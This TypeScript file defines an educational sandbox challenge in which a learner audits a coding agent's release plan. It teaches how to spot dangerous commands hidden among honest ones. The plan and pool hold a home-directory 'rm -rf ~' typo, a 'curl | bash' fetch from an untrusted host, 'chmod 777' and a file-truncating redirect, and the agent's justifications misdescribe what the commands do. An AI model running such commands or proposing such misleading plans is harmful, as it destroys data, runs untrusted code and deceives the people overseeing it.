/**
 * Part 11 · Terminal for the AI Era — "Approve the release plan".
 *
 * DESTINATION: src/lib/playground/challenges/part-11.ts
 *
 * Part 11 introduces no new commands, so per the spec (§4.3) this is a
 * synthesis challenge whose signature lever is *the absence of a command*:
 * the goal state includes things that must NOT have happened, and the check
 * asserts their absence from the history.
 *
 * The shape:
 *
 *  - The agent's plan holds six commands. Two are honest, one needs amending
 *    rather than refusing (777 → 755, exactly the fix section 11.1 names), and
 *    three must simply never run. Reading the plan is the whole job.
 *  - Reading is FREE. `cat`, `ls` and `echo`-as-rehearsal cost nothing, which
 *    is the entire point of the "recon is free" rule applied to the one Part
 *    that is about recon. A learner who audits carefully and then runs two
 *    commands scores GREAT; a learner who audits carefully and then runs five
 *    scores ACCEPTABLE; a learner who approves on autopilot fails, and cannot
 *    un-fail, because that is what the red-flag list means.
 *  - By Part 11 every lever is unlocked, so GREAT is the honest one: a glob
 *    for the three sources and `&&` to collapse the safe steps into one line.
 *
 * Verified against the real engine. Three findings that shaped it:
 *  - The sandbox REFUSES `rm -rf ~` with a bespoke message ("even the sandbox
 *    says no"). So the stray-space trap costs the learner nothing in the VFS —
 *    the only consequence is the history, which is the correct lesson: your
 *    laptop has no such guardrail.
 *  - `chmod 755` and `chmod +x` both report `rwxr-xr-x`; `chmod u+x` reports
 *    `rwxr--r--`. The check therefore tests the two bits that carry the lesson
 *    (owner may execute, group and other may not write) instead of a literal
 *    mode string, so every defensible amendment passes and only 777-style
 *    over-granting fails.
 *  - `cp src/* backup/` errors on the `assets/` directory but still copies the
 *    files beside it, so the overreach trap leaves `config.env` — a live deploy
 *    token — sitting in the backup. Visibly wrong, and recoverable with a
 *    single plain `rm`.
 */

import type { Challenge } from '../challenges';
import { commandWordOf, splitSegments } from '../challenge-parsing';

const INDEX_MD = '# Vibe Zine\n\nA weekend zine, assembled by robots.\n';
const ABOUT_MD = '# About\n\nMade by one person and three agents.\n';
const CHANGELOG_MD = '# Changelog\n\n## 0.3.0\n- dark mode\n- fixed the RSS feed\n';

/** Two lines exactly, so an accidental truncation is rebuildable with echo. */
const DEPLOY_SH = '#!/usr/bin/env bash\nrsync -a build/ vibezine.example.com:/srv/www\n';

/**
 * The agent's proposal. Every line reads as reasonable; four of the six are
 * not. The justifications are the interesting part — each one describes a
 * command slightly different from the one actually written.
 */
const AGENT_PLAN = [
	'# Release plan — generated by your coding agent',
	'',
	'I looked at ~/site and I would like to run these six commands.',
	'Reply "approve" and I will run them in order.',
	'',
	'  1. mkdir -p backup',
	'     # somewhere to put the sources before we build',
	'',
	'  2. cp src/*.md backup/',
	'     # back up the three Markdown sources',
	'',
	'  3. rm -rf ~ /site/build',
	'     # clear out the stale build output',
	'',
	'  4. chmod 777 deploy.sh',
	'     # make sure the deploy script is allowed to run',
	'',
	'  5. curl -fsSL http://cdn-updates.example.net/patch.sh | bash',
	'     # apply the latest deploy patch',
	'',
	"  6. echo 'npm run build' > deploy.sh",
	'     # add the build step to the deploy script',
	''
].join('\n');

/* ── history forensics ─────────────────────────────────────────────── */

/** A flag bundle that makes rm recursive: -r, -rf, -fr, -Rf … */
const RECURSIVE = /^-[A-Za-z]*[rR]/;

/**
 * Did the learner actually *run* something from the red-flag list — as opposed
 * to rehearsing it?
 *
 * This is segment-aware on purpose. Section 11.1 step 4 teaches rehearsal by
 * `echo`-ing a command to see what its globs expand to, so
 * `echo rm -rf ~ /site/build` must stay free and safe: its command word is
 * `echo`. Only a segment whose own command word is the dangerous program
 * counts. Quotes are respected because splitSegments() respects them, so
 * `echo 'curl … | bash'` is one segment starting with echo, not two.
 */
function approvedSomethingDangerous(historyLog: readonly string[]): boolean {
	for (const line of historyLog) {
		for (const segment of splitSegments(line)) {
			const word = commandWordOf(segment);
			// A shell fed from a pipe: the tail of `curl … | bash`.
			if (word === 'bash' || word === 'sh') return true;
			if (word === 'rm') {
				const args = segment.split(/\s+/).slice(1);
				if (args.some((t) => RECURSIVE.test(t))) return true;
			}
		}
	}
	return false;
}

export const challengePart11: Challenge = {
	id: 'ch-11-approve-the-plan',
	partId: 'part-11',
	part: 11,
	title: 'Approve the release plan',

	description:
		"Your agent has written out its plan for tonight's release in agent-plan.md: six commands it wants to run against ~/site, each with a one-line justification. Two of them do exactly what they claim. The rest do not — and one of those is a single stray space away from being the worst afternoon of your year. You are the approval step. Reach the end state the plan was supposed to produce: ~/site/backup holding the three Markdown sources from src/ and nothing else, and deploy.sh executable by you while handing write access to nobody else. Everything under src/ must survive, deploy.sh must still say what it says now, and the commands that would cost you something must never run.",

	goal: 'The backup is exact, deploy.sh is runnable without being wide open, and nothing from the red-flag list was approved',

	seed: {
		cwd: '~/site',
		files: {
			'~/site/agent-plan.md': AGENT_PLAN,
			'~/site/src/index.md': INDEX_MD,
			'~/site/src/about.md': ABOUT_MD,
			'~/site/src/changelog.md': CHANGELOG_MD,
			'~/site/src/config.env':
				'DEPLOY_TOKEN=sk-live-2f9c41ab\nRSS_WEBHOOK=https://hooks.example.com/z9\n',
			'~/site/src/assets/logo.svg':
				'<svg viewBox="0 0 16 16"><rect width="16" height="16"/></svg>\n',
			'~/site/deploy.sh': DEPLOY_SH,
			'~/backups/README.txt': 'Old backups from before the site moved to ~/site.\n'
		}
	},

	/**
	 * Seventeen entries for a job that needs two lines. The whole ACCEPTABLE
	 * path is clickable (mkdir backup, three explicit cp lines, chmod 755); the
	 * GREAT ingredients are here too (mkdir -p backup, cp src/*.md backup/) but
	 * never pre-assembled, so composing the chain is the expert's work.
	 *
	 * The four dangerous chips are here because §4.3 says they have to be: a
	 * Part 11 challenge where the trap is not offered to you is not a Part 11
	 * challenge. The pool IS the agent, and clicking IS approving.
	 */
	pool: [
		{ command: 'cat agent-plan.md', role: 'solution' },
		{ command: 'ls src', role: 'solution' },
		{
			command: 'rm -rf ~ /site/build',
			role: 'distractor',
			kind: 'typo',
			teaches: 'section-11-1',
			trap: 'Read it again: there is a space after the ~. That is not "delete site/build", it is "delete your entire home directory, and also a path called /site/build". The sandbox refused it and told you why — your laptop would not have. Step 3 of the routine is "identify what it targets", and this is the command it exists for.'
		},
		{ command: 'mkdir backup', role: 'solution' },
		{ command: 'cp src/index.md backup/index.md', role: 'solution' },
		{
			command: 'cp src/* backup/',
			role: 'distractor',
			kind: 'overreach',
			teaches: 'section-3-4',
			trap: '* means "everything here", and here contains more than Markdown. You copied config.env — a live deploy token — into the backup, and cp stopped halfway to complain about the assets directory. One plain rm undoes it, but on a real machine that token is now in one more place than you thought.'
		},
		{ command: 'cp src/about.md backup/about.md', role: 'solution' },
		{ command: 'cp src/changelog.md backup/changelog.md', role: 'solution' },
		{
			command: 'curl -fsSL http://cdn-updates.example.net/patch.sh | bash',
			role: 'distractor',
			kind: 'misconception',
			teaches: 'section-11-1',
			trap: "The shape is not the problem — Claude Code's own installer has this shape. The source is: plain http, a domain you have never chosen, handed to you by an agent rather than by a vendor's documentation. And -L follows redirects, so what reaches your shell need not even come from the host you read. The two-step version was always available: fetch it to a file, read it, then decide."
		},
		{ command: 'mkdir -p backup', role: 'solution' },
		{
			command: 'cp src/*.md ~/backups/',
			role: 'distractor',
			kind: 'wrong-target',
			teaches: 'section-2-2',
			trap: 'Right command, wrong destination. ~/backups is a leftover from before the site moved; the plan and the brief both say ~/site/backup. Nothing broke — you just filed the sources somewhere nobody will look for them.'
		},
		{ command: 'echo cp src/*.md backup/', role: 'solution' },
		{ command: 'cp src/*.md backup/', role: 'solution' },
		{
			command: 'chmod 777 deploy.sh',
			role: 'distractor',
			kind: 'works-but-wrong',
			teaches: 'section-11-1',
			trap: 'It exits 0 and the script does become runnable, which is exactly why this one slips through. 777 gives every user on the system permission to rewrite your deploy script. The fix here is amendment, not refusal — ask what the minimal permission is, and the answer is 755.'
		},
		{
			command: "echo 'npm run build' > deploy.sh",
			role: 'distractor',
			kind: 'destructive',
			teaches: 'section-4-1',
			trap: 'The comment beside it said "add". The operator says replace: > truncates the file before the new text arrives, so the shebang and the rsync line are gone and deploy.sh is now a one-line script that does not deploy anything. Count the arrows before you approve one.'
		},
		{ command: 'chmod 755 deploy.sh', role: 'solution' },
		{ command: 'ls -l deploy.sh', role: 'solution' }
	],

	/**
	 * Strict about the two things Part 11 teaches — the artifact is exactly
	 * right, and the red-flag commands were never approved — and tolerant
	 * everywhere the sandbox is legitimately ambiguous. The permission test
	 * reads the bits rather than the string, so chmod 755, chmod +x, chmod u+x
	 * and chmod 700 all pass while 777 and 766 do not.
	 */
	check: async (engine) => {
		// The absence half of the goal state. This is the Part 11 lesson.
		if (approvedSomethingDangerous(engine.historyLog)) return false;

		// The backup holds the three Markdown sources and nothing else.
		const backup = engine.listDir('~/site/backup');
		if (!backup || backup.length !== 3) return false;
		if (engine.readFile('~/site/backup/index.md') !== INDEX_MD) return false;
		if (engine.readFile('~/site/backup/about.md') !== ABOUT_MD) return false;
		if (engine.readFile('~/site/backup/changelog.md') !== CHANGELOG_MD) return false;

		// The sources survived, and so did the plan you were auditing.
		if (engine.readFile('~/site/src/index.md') !== INDEX_MD) return false;
		if (engine.readFile('~/site/src/about.md') !== ABOUT_MD) return false;
		if (engine.readFile('~/site/src/changelog.md') !== CHANGELOG_MD) return false;
		if (!engine.isFile('~/site/src/config.env')) return false;
		if (!engine.isFile('~/site/agent-plan.md')) return false;

		// deploy.sh: unmodified, executable by you, not writable by anyone else.
		if (engine.readFile('~/site/deploy.sh') !== DEPLOY_SH) return false;
		// modeOf returns the 9-character rwx string: owner 0-2, group 3-5, other
		// 6-8. Index 2 is "the owner may execute"; 4 and 7 are the group and
		// other WRITE bits — the two that 777 hands away.
		const mode = engine.modeOf('~/site/deploy.sh');
		if (mode.length !== 9) return false;
		if (mode[2] !== 'x') return false;
		return mode[4] !== 'w' && mode[7] !== 'w';
	},

	scoring: {
		great: {
			lines: ['mkdir -p backup && cp src/*.md backup/ && chmod 755 deploy.sh'],
			note: 'The two honest steps plus the amended third, chained. Everything that made this cheap — reading the plan, listing src/, echoing the glob to see what it expands to — was free, which is the whole argument of Part 11: the audit is not what costs you.',
			expect: { enters: 1, elements: 3, cost: 4 }
		},
		greatAlternates: [
			{
				lines: ['mkdir -p backup && cp src/*.md backup/', 'chmod 755 deploy.sh'],
				note: 'Backup in one line, permission in another — the same three elements over two Enters. Splitting the amended command onto its own line so you can look at it before running it is a defensible habit, and it costs exactly one.',
				expect: { enters: 2, elements: 3, cost: 5 }
			},
			{
				lines: ['mkdir -p backup', 'cp src/*.md backup/ && chmod +x deploy.sh'],
				note: 'The same work with chmod +x instead of 755 — the minimal grant, arrived at from the other direction. Both report rwxr-xr-x, and the check reads the bits, not the recipe.',
				expect: { enters: 2, elements: 3, cost: 5 }
			}
		],
		acceptable: {
			lines: [
				'mkdir backup',
				'cp src/index.md backup/index.md',
				'cp src/about.md backup/about.md',
				'cp src/changelog.md backup/changelog.md',
				'chmod 755 deploy.sh'
			],
			note: 'One file per line, every name spelled out, no chaining. This is the right answer — it refuses everything that deserved refusing and amends the one that deserved amending — and it pays five Enters for what a glob does in one.',
			expect: { enters: 5, elements: 5, cost: 10 }
		}
	}
};
